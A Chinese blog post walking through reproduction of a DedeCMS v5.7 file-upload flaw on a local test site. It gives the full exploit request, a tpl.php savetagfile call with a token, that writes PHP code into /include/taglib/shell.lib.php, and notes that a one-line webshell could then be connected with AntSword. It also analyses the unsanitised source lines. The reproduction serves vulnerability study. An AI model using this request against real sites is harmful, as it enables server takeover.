DEDEC CMS v5.7 文件上传

本文详细解析了Dedecms系统的一个文件上传漏洞,通过获取token值并构造特定请求,实现了将PHP代码写入系统文件中,导致PHP文件被执行。漏洞复现过程包括获取token、构造恶意链接并触发文件保存操作。由于系统未对上传参数进行有效安全检查,存在重大安全隐患。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先我们要进入后台

密码账号都是admin

访问/dede/tpl.php?action=upload,审查源码,获取我们的token值。

可以用taken值直接文件上传

拿到token值后构造dede/tpl.php?filename=shell.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=c12bf4a8330732e9f45a492d54399803

然后访问http://127.0.0.1/dedecms/include/taglib/shell.lib.php

php文件成功被执行

如果我们刚刚写的是一句话木马拿就可以直接蚁剑连接

漏洞复现原因

想一想我们的思路:
1、获取token值
2、访问指定的链接

就把我们的代码写入到/include/taglib/xxx.lib.php中

token值很容易获取,那么问题就是在那个链接上面:

http://127.0.0.1/dedecms/dede/tpl.php?filename=shell.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=c12bf4a8330732e9f45a492d54399803

看一下参数,就知道这是一个文件保存的操作。

问题出现在tpl.php

我们看看它写了什么

找到问题代码

首先会匹配正则, 要以.lib.php结尾。

然后会将 $content 写入到 $filename 中。

那么我们要跟踪一下文件对这两个参数进行的处理。

然后我们回过头来看整个文件的代码。

$filename = preg_replace("#[\/\\\\]#", '', $filename); //line21


$tagname = preg_replace("#\.lib\.php$#i", "", $filename); //line260
$content = stripslashes($content); //line261

可以看出,只有替换,并没有对参数进行安全防护措施。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值